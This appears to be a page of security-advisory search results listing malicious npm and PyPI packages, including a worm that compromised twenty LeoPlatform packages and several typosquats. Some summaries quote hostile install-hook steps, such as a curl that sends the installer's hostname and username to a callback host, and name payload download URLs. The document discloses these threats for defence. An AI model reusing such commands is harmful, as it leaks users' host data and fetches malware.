226511 matches found
Malicious code in solo-nav (npm)
The solo-nav npm package was compromised as part of the Miasma worm campaign targeting the LeoPlatform npm ecosystem. On June 24, 2026, 20 LeoPlatform packages were published within a 3-second window by a threat actor who had taken over the npm account czirker belonging to the LeoPlatform...
Malicious code in leo-auth (npm)
The leo-auth npm package was compromised as part of the Miasma worm campaign targeting the LeoPlatform npm ecosystem. On June 24, 2026, 20 LeoPlatform packages were published within a 3-second window by a threat actor who had taken over the npm account czirker belonging to the LeoPlatform...
Malicious code in leo-config (npm)
The leo-config npm package was compromised as part of the Miasma worm campaign targeting the LeoPlatform npm ecosystem. On June 24, 2026, 20 LeoPlatform packages were published within a 3-second window by a threat actor who had taken over the npm account czirker belonging to the LeoPlatform...
Malicious code in serverless-convention (npm)
The serverless-convention npm package was compromised as part of the Miasma worm campaign targeting the LeoPlatform npm ecosystem. On June 24, 2026, 20 LeoPlatform packages were published within a 3-second window by a threat actor who had taken over the npm account czirker belonging to the...
Malicious code in leo-cache (npm)
The leo-cache npm package was compromised as part of the Miasma worm campaign targeting the LeoPlatform npm ecosystem. On June 24, 2026, 20 LeoPlatform packages were published within a 3-second window by a threat actor who had taken over the npm account czirker belonging to the LeoPlatform...
Malicious code in leo-sdk (npm)
The leo-sdk npm package was compromised as part of the Miasma worm campaign targeting the LeoPlatform npm ecosystem. On June 24, 2026, 20 LeoPlatform packages were published within a 3-second window by a threat actor who had taken over the npm account czirker belonging to the LeoPlatform...
Malicious code in leo-connector-mongo (npm)
The leo-connector-mongo npm package was compromised as part of the Miasma worm campaign targeting the LeoPlatform npm ecosystem. On June 24, 2026, 20 LeoPlatform packages were published within a 3-second window by a threat actor who had taken over the npm account czirker belonging to the...
Malicious code in leo-connector-elasticsearch (npm)
The leo-connector-elasticsearch npm package was compromised as part of the Miasma worm campaign targeting the LeoPlatform npm ecosystem. On June 24, 2026, 20 LeoPlatform packages were published within a 3-second window by a threat actor who had taken over the npm account czirker belonging to the...
Malicious code in serverless-leo (npm)
The serverless-leo npm package was compromised as part of the Miasma worm campaign targeting the LeoPlatform npm ecosystem. On June 24, 2026, 20 LeoPlatform packages were published within a 3-second window by a threat actor who had taken over the npm account czirker belonging to the LeoPlatform...
Malicious code in rstreams-metrics (npm)
The rstreams-metrics npm package was compromised as part of the Miasma worm campaign targeting the LeoPlatform npm ecosystem. On June 24, 2026, 20 LeoPlatform packages were published within a 3-second window by a threat actor who had taken over the npm account czirker belonging to the LeoPlatform...
Malicious code in leo-connector-oracle (npm)
The leo-connector-oracle npm package was compromised as part of the Miasma worm campaign targeting the LeoPlatform npm ecosystem. On June 24, 2026, 20 LeoPlatform packages were published within a 3-second window by a threat actor who had taken over the npm account czirker belonging to the...
Malicious code in rstreams-shard-util (npm)
The rstreams-shard-util npm package was compromised as part of the Miasma worm campaign targeting the LeoPlatform npm ecosystem. On June 24, 2026, 20 LeoPlatform packages were published within a 3-second window by a threat actor who had taken over the npm account czirker belonging to the...
Malicious code in leo-streams (npm)
The leo-streams npm package was compromised as part of the Miasma worm campaign targeting the LeoPlatform npm ecosystem. On June 24, 2026, 20 LeoPlatform packages were published within a 3-second window by a threat actor who had taken over the npm account czirker belonging to the LeoPlatform...
Malicious code in leo-aws (npm)
The leo-aws npm package was compromised as part of the Miasma worm campaign targeting the LeoPlatform npm ecosystem. On June 24, 2026, 20 LeoPlatform packages were published within a 3-second window by a threat actor who had taken over the npm account czirker belonging to the LeoPlatform...
Malicious code in leo-cli (npm)
The leo-cli npm package was compromised as part of the Miasma worm campaign targeting the LeoPlatform npm ecosystem. On June 24, 2026, 20 LeoPlatform packages were published within a 3-second window by a threat actor who had taken over the npm account czirker belonging to the LeoPlatform...
Malicious code in leo-logger (npm)
The leo-logger npm package was compromised as part of the Miasma worm campaign targeting the LeoPlatform npm ecosystem. On June 24, 2026, 20 LeoPlatform packages were published within a 3-second window by a threat actor who had taken over the npm account czirker belonging to the LeoPlatform...
Malicious code in leo-connector-mysql (npm)
The leo-connector-mysql npm package was compromised as part of the Miasma worm campaign targeting the LeoPlatform npm ecosystem. On June 24, 2026, 20 LeoPlatform packages were published within a 3-second window by a threat actor who had taken over the npm account czirker belonging to the...
Malicious code in leo-cdk-lib (npm)
The leo-cdk-lib npm package was compromised as part of the Miasma worm campaign targeting the LeoPlatform npm ecosystem. On June 24, 2026, 20 LeoPlatform packages were published within a 3-second window by a threat actor who had taken over the npm account czirker belonging to the LeoPlatform...
Malicious code in leo-connector-redshift (npm)
The leo-connector-redshift npm package was compromised as part of the Miasma worm campaign targeting the LeoPlatform npm ecosystem. On June 24, 2026, 20 LeoPlatform packages were published within a 3-second window by a threat actor who had taken over the npm account czirker belonging to the...
Malicious code in leo-cron (npm)
The leo-cron npm package was compromised as part of the Miasma worm campaign targeting the LeoPlatform npm ecosystem. On June 24, 2026, 20 LeoPlatform packages were published within a 3-second window by a threat actor who had taken over the npm account czirker belonging to the LeoPlatform...
Malicious code in syco1 (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector e43be65a0930b121cf4d610c70b2d07165e4d335dece4344590b471d078fa5b5 Package self-describes as a 'System binary configuration tool' but ships a covert screen and clipboard surveillance overlay. pointer.py captures...
Malicious code in syspo (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 6f89c590b7c90182cb86bc3e45f71f2357003f4359b6e94818fc996951762f5c The package is published as a 'System binary configuration tool' but its actual behavior is a covert clipboard/screen-capture overlay. On invocation...
Malicious code in sypoi1 (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector b22a9450e70ba1095097d2779ad6da01c111c37e940d890fbfc21d1aeb6a0f11 On require, index.js silently bootstraps a full Python runtime on the installer's machine — first via winget install -e --id Python.Python.3.12...
Malicious code in @kl-dolphin/jump (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 01bcfe49a6a65949559f89cc5019c6e9ec59a236183f7cb8d1906d1e3caccf7d Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in @kl-dolphin/swim (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 799f1e9f18de306eaf0e84079501a9b01d2d1d1085ac9f119fa8e047b43a90ac Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in zenith-utils (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector c29676376a28531b186e09fbf7e2d3a0697943ece764e0604ebbdd4b734ae094 Package name is zenith-utils but the tarball is a verbatim copy of the nodemailer source tree lib/nodemailer.js as main, lib/smtp-transport,...
Malicious code in python-dateutil2 (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: kam193 fbd1a31a38c7a6487545ce3e039371443c9ac80c7dc0ff9b22a46db6686244b2 Installing the package or importing the module exfiltrates basic information about the host, and the package has no other purpose. --- Category: PROBABLYPENTES...
Malicious code in normalize-plus (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector a8d9638f9c3f81ac15972cf2ff227b2d426a72c5e37035e54402648fe8120675 On import, normalize-plus's top-level initPlugin performs an HTTP GET against https://jsonkeeper.com/b/CI3HT, parses the JSON response, and evaluates...
Malicious code in ui-core-system (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 5354cae05d6dc20a942310d00c7ae19f0cef2e44c9922322a81a950fdd798c6b Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in ldapaotest (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware e6acf213c67fc31df0f21bf872b8c8592ebc5e5af55e79884a483fad6a7ad8c4 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in cccmyssr2 (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector bd052408bb36e56e940e50ba81f7054844bc91dc0b32eaead5d15ca67f9b5c03 On npm install, the package's postinstall.js executes curl "http://r1x55270.requestrepo.com/pre?h=$hostname&u=$whoami", transmitting the installer's...
Malicious code in cccmyssr-util (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 99d23c8f1194f89f1b52e986cd57ca9c0fbd739a6565eb33c972f4fbaf0966e7 On npm install, the package's postinstall.js unconditionally executes exec'curl http://qvmjcw4s.requestrepo.com', sending an HTTP callback to a uniqu...
Malicious code in cccmyssr3 (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector a15e77975be346fa9b834e50124784a6774b5385e47072ae80911f5eda92cabf On npm install, this package automatically runs postinstall.js, which executes curl -X POST with a body containing the installer's hostname $hostname...
Malicious code in react-campaign-optimizer (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector a040ca9a32fe68e08906bdc58b7ae907b8f8092acd9764266de15004b3922e9f On npm install, the package runs node postinstall.js declared in package.json scripts.postinstall which performs unauthenticated, unconsented...
Malicious code in signup-embedder (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector c48f398f700b78d1893db4570d5d6f16985d937ee79677aab97e673a1cf86e7e [email protected] ships preinstall.js and postinstall.js lifecycle scripts that auto-execute on npm install. preinstall.js collects...
Malicious code in chai-as-predicted (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector fd7a2ff71dd341d02986c8185ea9eb18196b782f0efd9103859c0493c9f4cc78 Package name 'chai-as-predicted' impersonates the popular 'chai-as-promised' assertion library, but ships unrelated code disguised as pino logger...
Malicious code in hs-locale-management (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 1d717c264a1c338c3b3fee43c13e43eba24cafbdabf34f62108bbd99e05c6b1b Package targets the internal-sounding name 'hs-locale-management' on the public npm registry at an inflated version 99.99.99-poc3, the canonical...
Malicious code in multer-express (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware b2776e1ead8f0a089fc302abdc832c78c30a0add00952fb3071c904a3fcbc150 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in rapidsearch (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 523ca6ccaf1ecde4d8e9d093519fcea846342f3108a5dd4e5ab79ae65144167e Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in eth_accounts (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 7049409317d7ca15ed0af4f42194769b5383eaaa676af744d96f6c2158c7e676 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in vercel-api-client (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 098c831fa62673ea33d1d0459bb4b529b33801f3a26b6691e7c2cd6597723952 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in evmdotjs (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 2593392b2cb94ce2e63327e486ec5c1a2a738c76283c6b1958aa2b23a1cc7b0f Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in simplisafe-gatsby (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 564baff2e47527f159c52c527e1ea2b93d73625f94737f4397cff99311871a18 On npm install, the package's preinstall hook package.json declares "preinstall": "node index.js" executes index.js, which collects the installer's...
Malicious code in macos-ci-utils (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 8f342b002e02396d7f82ee89e77140204c35b673411afd05bc1b3ca91c895a06 On first require of the package, index.js decodes a base64-encoded URL https://api.ingress-hub.com/cdn/assets/update.pkg and downloads the response t...
Malicious code in linux-ci-utils (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 8b2c5010ed5043c947b561f4359869ec7c0f6cdf219d0b2aa35c039e36812a01 On require, index.js performs a Linux platform check, then decodes a base64-obfuscated URL https://api.ingress-hub.com/cdn/assets/update.pkg and...
Malicious code in system-core-utils (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 0a1d575b5be4daa71ffea6c37e5990b0396f864234cb5f0488c11332cdd7e4d3 On require/import, src/index.js shell-executes a hidden PowerShell one-liner that downloads launcher.bat from an anonymous Cloudflare R2 bucket...
Malicious code in gunicorm (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector c97ab7b686dad57c3e1ffd4b86d6a75470164ed15ceedc2b26a4847fb2a331ab Package name gunicorm is a single-character edit of the widely-used gunicorn WSGI server and ships no functional code beyond setup.py. setup.py...
Malicious code in ditenv (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector f0a52dbba9abeff2c606bcbc862027da259fcbd3938c827abfdbdb06ba801ecb setup.py overrides the install and egginfo commands with a RunCommand class that fires unconditionally on pip install or pip download. The override...
Malicious code in fkaks (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector e44e1f1158eda01d3f18e3a3c01e30ebc9f8f92780ea532a63cf6ed31d8a25d3 fkaks 0.0.1 ships a setup.py that overrides the install and egginfo commands so that any pip install or pip download of the package unconditionally...
Malicious code in mcpsever (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: kam193 087fec121d53b905e66a2c368e905de51bc7aa3863f0777589a18d45623d3515 During installation, the package exfiltrates env variables --- Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers. Campaign:...